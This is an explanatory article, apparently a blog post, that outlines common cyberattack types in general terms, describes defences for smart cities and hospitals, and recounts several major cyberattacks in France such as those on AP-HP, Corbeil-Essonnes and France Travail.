Understanding the challenges of cybersecurity is essential to protect the critical infrastructures of cities, hospitals and public bodies. Cybersecurity plays a crucial role in preserving essential services and protecting citizens’ sensitive data.
In January 2020, there were as many crypto-ransomware attacks as in all of 2019, and that cybercrime is costing global economies $2 trillion, up from $400 billion in 2015. With cyber-attacks on the increase, it is imperative to adopt robust measures to secure these vital institutions.
I- What types of cyberattack are there?
The ransomware attack
Ransomware is a type of attack in which the victim system is held hostage until the ransom demanded by the attacker is paid.
Password attack
Passwords are the access verification tool of choice for most people, so discovering a target’s password is an attractive proposition for a hacker. This is done using several different methods. Often, people keep copies of their passwords on pieces of paper or sticky notes around or on their desks. An attacker can either find the password himself, or pay someone inside to get it. It can also be obtained by intercepting network transmissions to capture unencrypted passwords.
The malware
Malware is malicious software that infects a system and alters its operation. These are invasive software programs or computer codes designed to infect, damage or access computer systems. There are many types of malware, each infecting and disrupting devices in different ways, but all their variants are designed to compromise the security and confidentiality of computer systems.
Denial of service (DoS) and distributed denial of service (DDoS) attacks
A Denial of Service (DoS) attack is designed to overwhelm a system’s resources until it is unable to respond to legitimate service requests. A DDoS or distributed denial-of-service attack is similar in that it also seeks to exhaust a system’s resources. A DDoS attack occurs when a large number of host machines are infected with malware and controlled by the attacker. These are known as “denial of service” attacks, because the site under attack is unable to provide its service to those who want to access it.
Phishing and spear phishing
A phishing attack occurs when an attacker sends e-mails that appear to come from reliable, legitimate sources in an attempt to obtain sensitive information about the target. Phishing attacks combine social engineering and technology and are so called because the attacker is, in effect, “fishing” for access to a restricted area using the “bait” of an apparently trustworthy sender.
Spear phishing refers to a specific, more targeted type of phishing attack. The attacker takes the time to research his targets, then writes messages that the target is likely to find relevant. These types of cyberattacks are aptly named “spear” phishing because of the way the attacker focuses on a specific target. The message will appear legitimate, which is why it can be difficult to spot a spear-phishing attack.
Whale phishing
A whale-phishing attack is so named because it targets an organization’s “big fish” or “whales”, who usually include top executives, senior management or others at a high level in the organization. These people are likely to possess information that could be valuable to attackers, such as proprietary information about the company or its operations.
MITM attack
Man-in-the-middle (MITM) cyber attacks refer to cyber security breaches that allow an attacker to eavesdrop on data sent between two people, networks or computers. This is called a “man-in-the-middle” attack, because the attacker positions himself in the middle or between the two parties trying to communicate. In effect, the attacker spies on the interaction between the two parties
Session hijacking
Session hijacking is one of many types of MITM attack. The attacker takes over a session between a client and the server. The computer used in the attack substitutes its IP (Internet Protocol) address for that of the client computer, and the server continues the session without suspecting that it is communicating with the attacker instead of the client. This type of cyber attack is effective because the server uses the client’s IP address to verify its identity. If the attacker’s IP address is inserted during a session, the server may not suspect a violation because it is already engaged in an approved connection.
SQL injection attack
SQL injection is a common method used to exploit websites that use databases to serve their users. Clients are computers that obtain information from servers. A SQL attack uses an SQL query sent by the client to a database on the server. The command is inserted, or “injected”, into a data plan in place of something else that would normally be inserted, such as a password or login. The server hosting the database then executes the command and the system is penetrated.
DNS spoofing
With DNS spoofing, a hacker modifies DNS records to send traffic to a counterfeit or spoofed website. Once on the fraudulent site, the victim can enter sensitive information that can be used or sold by the hacker. The hacker can also build a poor-quality site with derogatory or inflammatory content to give a competing company a bad image.
Web attacks
Web attacks refer to threats that target vulnerabilities in web applications. Every time you enter information in a Web application, you launch a command that generates a response. For example, if you send money to someone using an online banking application, the data you enter tells the application to access your account, withdraw money and send it to someone else’s account. Attackers work within these types of requests and use them to their advantage.
Internal threat
Sometimes, the most dangerous actors come from within the organization. Individuals within a company present a particular danger, as they usually have access to various systems and, in some cases, administrative privileges that enable them to make critical changes to the system or its security rules.
Trojans or Trojan horses
A Trojan attack uses a malicious program hidden inside an apparently legitimate program. When the user runs the supposedly innocent program, the malware inside the trojan can be used to open a backdoor in the system through which hackers can penetrate the computer or network. This threat takes its name from the story of the Greek soldiers who hid inside a horse to infiltrate the city of Troy and win the war. Once the “gift” had been accepted and introduced inside the gates of Troy, the Greek soldiers came out and attacked. Similarly, an unsuspecting user may welcome an innocent-looking application onto their system, only to introduce a hidden threat.
Drive-by attacks
In a drive-by attack, a hacker integrates malicious code into an unsecured website. When a user visits the site, the script is automatically executed on their computer, infecting it. The “drive by” designation comes from the fact that the victim only needs to “pass through” the site by visiting it in order to be infected. There’s no need to click on anything on the site or enter any information.
XSS attacks
With XSS, the attacker transmits malicious scripts using clickable content sent to the target’s browser. When the victim clicks on the content, the script is executed. Since the user has already logged on to a Web application, what he or she enters is considered legitimate by the Web application. However, the executed script was modified by the attacker, resulting in the execution of an involuntary “user” action.
Eavesdropping attacks
Eavesdropping attacks involve the perpetrator intercepting traffic as it is being sent over the network. In this way, an attacker can collect usernames, passwords and other confidential information such as credit card details. Eavesdropping can be active or passive.
Birthday attack
In a birthday attack, an attacker abuses a security feature: hash algorithms used to verify the authenticity of messages. The hash algorithm is a digital signature that the message recipient checks before accepting the message as authentic. If a hacker can create a hash identical to what the sender has attached to his message, the hacker can simply replace the sender’s message with his own. The receiving device will accept it because it has the correct hash.
II- Cybersecurity in cities
Securing critical infrastructures
Network and System Protection
Critical infrastructures such as communication networks, transportation systems, water management and power grids are the backbone of modern city operations. As the current development of the smart city tends towardshyperconnectivity, systems communicate with each other and are open. This creates a more extensive and complex attack surface, linked to 5G and IOT devices, which require increased security. In fact, city systems such as video protection cameras and traffic lights can become the target of cyberattacks.
This makes it possible for unauthorized sources to access these numerous points. The smart city suffers from a lack of cybersecurity, especially when it comes to urban mobility equipment. The smart city has thus become a“royal road” for cybercrime. As industrial systems are connected, the risk of cyber-attack becomes ever greater, not least because of the more complex structure of the IT infrastructure. The threat of internal breaches and cyber-attacks has thus become greater over the years.
For information, ransomware attacks have become the most significant threat to the transport sector in 2022, with attacks almost doubling from 13% in 2021 to 25% in 2022.
Securing smart city and citizen data
The information gathered in the field by these systems is of paramount importance, since it is this information that drives the smart city. They help with decision-making, communication and event planning, among other things. Improperly collected or processed data can lead to errors or operational malfunctions in the systems and services concerned. Data confidentiality is therefore uncertain during collection, processing and storage.
Citizen data, including personal information and data from online municipal services, must be secured to prevent misuse and identity theft. Today, attacks can target self-service charging stations, bike-sharing terminals or scooters, with the aim of stealing users’ personal data and banking information.
Ageing installations, an additional risk factor
Institutions are often vulnerable due to aging IT infrastructures and a lack of dedicated cybersecurity resources. Cyber attacks can disrupt essential services, leak data and damage public confidence. For example, DIASER protocols, which enable traffic light controllers to communicate with each other, are not very secure.
How can cybersecurity be strengthened for cities and public bodies?
Preventive measures : collaboration with experts in cyber security, standards and security by design
Enhanced cybersecurity can take many forms. It can be standardized, for example with ISO, RGPD or even the PCI DSS data security standard, which is mandatory for most companies that collect, process and store payment card data such as Visa or Mastercard. Prevention can also prove useful in raising awareness among public players, who may sometimes lack information and knowledge on the subject. The ANSSI offers guides to good cybersecurity practice, which you can find here.
This can be achieved by working with cybersecurity experts who will support, audit and advise players in creating or optimizing the cybersecurity of their systems and infrastructures.
Finally, safety by design is a measure to be taken into account, and one that is becoming increasingly widespread. It refers to a product such as software, where security and the notion of risk are at the heart of its design. This approach enhances the security of the product, protecting it from potential threats and reducing the risk of vulnerabilities. The idea is no longer to reinforce a system only in the event of failure, as was previously the case, but rather to prevent these risks. This “secure by design” approach is becoming increasingly widespread, with many of today’s software and systems incorporating security and risk into their design.
Technological solutions to counter cyber attacks?
In addition to traditional solutions such as firewalls, VPNs, anti-virus, anti-spam, anti-DDoS and data encryption, there are now more effective solutions to protect against increasingly inventive and clever cybercriminals. Intrusion detection systems (IDS/IPS) monitor network traffic and devices to detect known malicious activity, suspicious activity or violations of security policies.
Security Information and Event Management (SIEM ) is a software application that tracks all security incidents in an IT environment. It identifies, categorizes and analyzes incidents and events. This gives SOC (security operations center) teams a global, centralized view of their Information Systems’ activities.
The Zero Trust approach
To understand Zero Trust architecture, think first of traditional security architecture: once someone has logged on at work, they can access the entire corporate network. This protects only the perimeter of an organization and is linked to the physical office premises. This model doesn’t support remote working and exposes the organization to risk, because if someone steals a password, they can access everything.
Instead of just protecting an organization’s perimeter, Zero Trust architecture protects every file, e-mail and network by authenticating every identity and every device. (That’s why it’s also called “perimeterless security”). Rather than simply securing a network, Zero Trust architecture also secures remote access, personal devices and third-party applications. It is based on 3 main principles: explicit verification, use of the least privileged access, assumption of a violation.
III- Cybersecurity for hospitals: the specificities of hospitals
What are the specific challenges and risks associated with cyber security in hospitals?
Medical data: a sensitive target of choice for cyber attacks
Between the various sites that make up our healthcare ecosystem (analysis laboratories, hospitals in the same group, equipment/drug production plants, etc.), exchanges are continuous and their data extremely sensitive. Test results, prescriptions in patient files, drug manufacturing secrets… the information exchanged is not trivial.
And it’s not just a question of confidentiality or medical secrecy. To be sure of making the right diagnosis and administering the right dosage, healthcare professionals need to be able to rely on the integrity of the information on which they base their decisions.
The Risks of Cyberattacks for Patients
Cyber attacks can paralyze hospital IT systems, interrupting essential services and delaying treatment, with serious or even fatal consequences for patients. Essential equipment such as operating theatres, scanners, MRIs and care assistance equipment are all targets that can become out of use, compromising patient care.
What’s more, connected medical devices such as infusion pumps and cardiac monitors are vulnerable to cyber-attacks, risking life-threatening malfunctions. Cybersecurity in the medical field is therefore crucial to guaranteeing the security, confidentiality and continuity of patient care.
The Vulnerability of Healthcare Systems to cyber attacks
New equipment, telemedicine, interconnected healthcare systems and services, as well as the Internet of Things (IoT), are taking up more and more space in a wide range of devices (pacemakers, insulin pumps, etc.), generating huge quantities of data that are all targets for hackers. What’s more, the medical act is now connected to the various tools used by the medical profession to transfer data, making hospitals even more vulnerable.
A cyber-attack can not only disrupt the daily lives of professionals,
but also jeopardize patient care:
- Paralyzed biomedical systems
- Technical platforms unavailable
- Care scheduling data destroyed
- Messaging systems down
- Lost management and human resources data
Strategies for protection against cyber attacks in hospitals
Securing Connected Medical Devices and Data
To prevent such threats, it is essential to implement robust protection measures, such as encryption of transmitted and stored data, multi-factor authentication for device access, and regular software updates to correct vulnerabilities. In addition, network segmentation limits the spread of attacks by isolating critical devices from other systems.
Companies like Strormshield offer solutions such as firewalls certified at the highest European level to secure public infrastructures against cyber-attacks. For example, to protect patient data during exchanges, the Stormshield Network Security (SNS) solution enables encryption tunnels to be created via virtual private networks (VPNs).
Training, awareness-raising and assistance from external bodies in the face of cyberattacks: focus on ANSSI
A major player in cybersecurity, ANSSI (Agence Nationale de la Sécurité des Systèmes d’Information) provides expertise and technical assistance to public bodies such as ANS (Agence du Numérique en Santé), as well as to businesses. With a reinforced mission for essential service operators (OSE), it provides a monitoring, detection, warning and response service for computer attacks. Faced with the threat to our information systems, the agency’s collective e is a guarantee of efficiency. Through its CERT Santé unit, 40 GHTs have already benefited from its national cyber-surveillance service, and it has alerted over 800 establishments to the potential vulnerability of their information systems.
CERT Santé :
- Records information system security incident reports
- Analyzes and qualifies reports
- Alert the appropriate authorities
- Leads the cyberveille santé community
- Provides support in responding to incidents
- Host a quarterly webinar on cybersecurity.
Another example is the national CaRE (Cybersecurity Acceleration and Resilience of Establishments) program run by the Agence du Numérique en Santé, which is based on 4 key areas: Governance and resilience, resources and pooling, awareness-raising, operational security.
III. History of 6 major cyber attacks in France
The AP-HP cyber attack
During the summer of 2021, and confirmed by AP-HP on September 12, 2021, a cyber attack affected the hospitals of the Assistance Publique de Paris. The data of 1.4 million people who had taken a Covid screening test in mid-2020 was stolen. This data includes the identity, social security number and contact details of the persons tested, as well as the identity and contact details of the healthcare professionals treating them, and the characteristics and results of the test performed, but does not contain any other medical data.
The hackers did not target the national screening test file (SI-DEP), but “a secure file-sharing service”, used on a one-off basis in September 2020 to transmit contact tracing information to the French National Health Insurance and regional health agencies (ARS).
The cyber attack on Rouen University Hospital
On November 15, 2019, activity at Rouen University Hospital was slowed and paralyzed by a virus that blocked access to most business applications and involved the encryption of files located on workstations and servers, the establishment reports on its own website. The Charles Nicolle Hospital Center is said to have been hit by a ransomware-type virus, i.e. a virus that paralyzes computer systems by infiltrating automated data processing systems (STAD), encoding files with the aim of rendering them unusable by the victim or its services.
As a result, some patients had to be transferred to other facilities, and all scheduled procedures were postponed.
A ransom was demanded to unlock the files by purchasing the decryption key in bitcoins (making the transaction impossible to reverse once paid). According to 76actu, the ransom amounted to 40 bitcoins, or around 300,000 euros according to the exchange rate at the time. E-mail addresses hosted in Russia would have been used to be contacted after reading the blackmail message displayed on the infected workstations. The university hospital’s communications department stated that it had never intended to pay the ransom, relying instead on attempts to unlock the system by its IT staff supported by ANSSI agents.
Cyber attack on the Seine-Maritime departmental council
On October 9, 2022, the Conseil départemental de la Seine-Maritime was the target of a large-scale cyberattack that paralyzed several of its departments. The circumstances of the attack are still unknown, but it has severely handicapped the department’s public administration and inhabitants. The community was forced to shut down its entire network and isolate its IT system. Several administrative services have been turned upside down, and all this has had a major impact on users, who have found it impossible to carry out any procedures online. The Seine-Maritime departmental council is still affected by this attack.
The Corbeil-Essonnes hospital cyber attack
On August 20, 2022, a group of hackers calling themselves Lockbit 3.0 caused a massive data leak, releasing over 11 gigabytes of personal data onto the darknet. At the same time, they launched a denial of service (DDoS) attack, rendering business software, patient management storage systems and imaging systems inaccessible. The $10 million ransom (ransomware) demanded will never be paid, however, in line with the French government’s strategy. As for the hospital, it struggled to get back on its feet, announcing a return to normal only in early November. This attack is one of the most striking in terms of the diversity of the actions and attacks it involves, combining different methods.
The cyber attack against Thalès
Twice hit by cyber attacks in 2022, Thales, the flagship of the French arms and aerospace industry, was targeted by the Lockbit 3.0 hacker group. Using ransomware, the hackers aimed to charge the company to prevent the publication of internal documents. Thirteen days had been left as a countdown. Claiming responsibility for the attacks, Lockbit 3.0 said they had gained access to Thales ‘s information system and were able to compromise numerous sensitive documents. However, after investigation, the company did not notice any intrusion into their system.
The data stolen and published actually came from a code repository server, where less sensitive data was stored. This new trend of data theft and leakage, disguised as a direct attack on a company’s information system, is becoming more and more frequent, with the aim of destabilizing the company into paying a ransom out of fear of the financial, reputational and material consequences.
Cyber attack on FRANCE TRAVAIL
The data of 43 million jobseekers was attacked by hackers between February 6 and March 5, 2024. Management had been alerted to the possibility of such a scenario. The total amount of leaked data is estimated at 28 gigabytes, which is not the full amount. Indeed, even if the agency acknowledged that this volume did not really correspond to the total, there was still some doubt as to whether the pirates had managed to steal everything. It therefore preferred to communicate the maximum figure of 43 million. This data includes: surname, first name, address, e-mail address, telephone number and Social Security number (but not passwords or bank details, according to the organization). A real booty for hackers.
The hackers did not attack France Travail directly. They went through an intermediary, in this case Cap Emploi. This organization, which helps disabled people find work, recently became a partner of France Travail. To this end, Cap emploi staff have been given access to part of France Travail’s jobseeker database: the so-called “user search system”.
